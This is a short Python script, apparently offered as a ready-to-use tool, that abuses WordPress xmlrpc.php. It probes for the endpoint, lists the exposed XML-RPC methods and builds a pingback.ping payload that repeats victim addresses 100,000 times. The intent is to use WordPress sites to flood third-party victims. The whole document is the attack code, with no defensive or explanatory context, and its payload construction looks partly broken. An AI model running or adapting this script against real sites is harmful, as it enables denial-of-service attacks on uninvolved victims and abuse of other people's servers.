pingback attack exploit xmlrpc.php on wordpress

pingback_attack_xmlrpc.py

import requests

def verify_vulnerability(url) -> bool:
    # Verify if the target is vulnerable
    result = requests.get(url + "/xmlrpc.php")
    if result.status_code == 405:
        return True
    else:
        return False

def list_methods(url):
    # List all methods available
    payload = """<?xml version="1.0"?>
    <methodCall>
        <methodName>system.listMethods</methodName>
        <params>
        </params>
    </methodCall>"""
    exploit(url, payload)

def exploit(url, payload):
    # Exploit the target
    if not verify_vulnerability(url):
        print("[-] Target is not vulnerable")
        return
    result = requests.post(url + "/xmlrpc.php", data=payload, headers={"Content-Type": "text/xml"})
    print(result.text)

def pingback_attack(url, target:list, times:int):
    # Pingback exploit
    if not verify_vulnerability(url):
        print("[-] Target is not vulnerable")
        return

    params_string = ""
    for param in target:
        params_string += f"<param><value><string>{param}</string></value></param>"

    payload = f"""<?xml version="1.0"?>
    <methodCall>
        <methodName>pingback.ping</methodName>
        <params>
            {params_string * times}
        </params>
    </methodCall>"""
    exploit(url, payload)

if __name__ == "__main__":
    url = "host"
    target = [
        "victim1",
        "victim2",
    ]
    pingback_attack(url, target, 100000)